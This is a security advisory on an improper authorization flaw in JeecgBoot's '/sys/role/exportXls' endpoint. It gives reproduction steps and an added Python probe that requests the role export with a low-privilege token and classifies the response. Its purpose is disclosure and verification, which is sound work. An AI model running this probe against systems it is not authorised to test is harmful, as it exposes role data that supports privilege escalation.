JeecgBoot Improper Authorization Vulnerability in Role Export Function

Vulnerability

An improper authorization vulnerability has been identified in JeecgBoot versions through 3.8.2. The '/sys/role/exportXls' endpoint can be reached remotely by any authenticated session, and the server does not check whether the caller holds the role-management permission before serving the export. As a result, any authenticated user, regardless of assigned privileges, can export all system roles, including sensitive details such as role names, codes, and descriptions.

Impact

Exploitation of this vulnerability gives a low-privilege account a complete listing of the role model. That data is useful for reconnaissance: an attacker learns which privileged roles exist and how they are named, which supports targeted privilege escalation attempts and further information gathering against the application.

Reproduction

To reproduce this vulnerability, authenticate as a user who has not been granted the role-management permission and send a GET request to the '/sys/role/exportXls' endpoint with that user's session credentials. A vulnerable instance responds with an Excel file listing all system roles instead of an authorization error; confirm the finding by checking that the downloaded spreadsheet contains role rows and not just an empty template.
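As an added example (not code from the advisory or from the JeecgBoot project), the Python helper below performs the reproduction step against a test instance and classifies the response, distinguishing a real export (spreadsheet with role rows) from an authorization failure or an inconclusive answer such as a login page. The X-Access-Token header name and the JSON error shape with "success": false are assumptions about how JeecgBoot carries credentials and reports errors; the sample spreadsheet is a constructed fixture so the classifier can be exercised offline.

```python
"""Checker for the /sys/role/exportXls authorization issue described above.

Added example, not JeecgBoot code. Assumptions are marked in comments.
"""
import io
import json
import re
import zipfile

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy .xls container
ZIP_MAGIC = b"PK\x03\x04"                         # .xlsx is a zip of XML parts
EXPORT_PATH = "/sys/role/exportXls"


def count_xlsx_rows(body: bytes) -> int:
    """Count <row> elements in the first worksheet of an .xlsx payload."""
    with zipfile.ZipFile(io.BytesIO(body)) as zf:
        sheets = sorted(n for n in zf.namelist() if n.startswith("xl/worksheets/sheet"))
        if not sheets:
            return 0
        xml = zf.read(sheets[0]).decode("utf-8", "replace")
    return len(re.findall(r"<row\b", xml))


def classify_export_response(status: int, headers: dict, body: bytes):
    """Map one HTTP response to (verdict, exported_role_count).

    EXPORTED     - a spreadsheet with data rows came back to a caller who lacks
                   role-management rights: the vulnerable behaviour.
    DENIED       - 401/403, or a JSON body with "success": false (assumed shape
                   of JeecgBoot's Result wrapper).
    INCONCLUSIVE - anything else, e.g. an empty template or an HTML login page.
    """
    ctype = {k.lower(): v for k, v in headers.items()}.get("content-type", "").lower()
    if status in (401, 403):
        return ("DENIED", 0)
    if body.startswith(ZIP_MAGIC):
        rows = count_xlsx_rows(body)
        # The first row is the column header; only data rows count as exported roles.
        return ("EXPORTED", rows - 1) if rows > 1 else ("INCONCLUSIVE", 0)
    if body.startswith(OLE2_MAGIC):
        return ("EXPORTED", -1)  # legacy .xls; row count is not parsed here
    if "json" in ctype or body.lstrip().startswith(b"{"):
        try:
            doc = json.loads(body)
        except ValueError:
            return ("INCONCLUSIVE", 0)
        if isinstance(doc, dict) and doc.get("success") is False:
            return ("DENIED", 0)
    return ("INCONCLUSIVE", 0)


def probe(base_url: str, token: str, timeout: float = 10.0):
    """Live check against a test instance you are authorized to assess.

    `token` is the session token of a low-privilege account; carrying it in an
    X-Access-Token header is an assumption about JeecgBoot's auth transport.
    """
    import urllib.error
    import urllib.request

    req = urllib.request.Request(base_url.rstrip("/") + EXPORT_PATH,
                                 headers={"X-Access-Token": token})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_export_response(resp.status, dict(resp.headers), resp.read())
    except urllib.error.HTTPError as err:
        return classify_export_response(err.code, dict(err.headers), err.read())


def build_sample_xlsx(role_rows):
    """Constructed fixture: a minimal .xlsx-shaped zip with a header row plus
    one row per (name, code, description) tuple. Not real JeecgBoot output."""
    def row_xml(r, cells):
        cs = "".join(f'<c r="{chr(65 + i)}{r}" t="inlineStr"><is><t>{v}</t></is></c>'
                     for i, v in enumerate(cells))
        return f'<row r="{r}">{cs}</row>'

    rows = [row_xml(1, ("Role Name", "Role Code", "Description"))]
    rows += [row_xml(i + 2, cells) for i, cells in enumerate(role_rows)]
    sheet = ('<?xml version="1.0" encoding="UTF-8"?><worksheet><sheetData>'
             + "".join(rows) + "</sheetData></worksheet>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/worksheets/sheet1.xml", sheet)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_xlsx([("admin", "admin", "Administrator"),
                                ("test", "test", "Test role")])
    print(classify_export_response(200, {"Content-Type": "application/vnd.ms-excel"}, sample))
```

Run `probe("https://jeecg.example.test", token)` with a deliberately under-privileged account; an EXPORTED verdict with a positive row count is the finding, while DENIED means the permission check is in place. Counting data rows matters because an endpoint that returns an empty workbook to unauthorized callers is a different (and much smaller) issue than one that dumps every role.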

Added: Sep 25, 2025, 11:19 PM
Updated: Sep 25, 2025, 11:19 PM

Vulnerability Rating (Custom Algorithm)

spread: 0.8
impact: 2.5
exploitability: 6.6
remediation: 0.0
relevance: 0.6
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.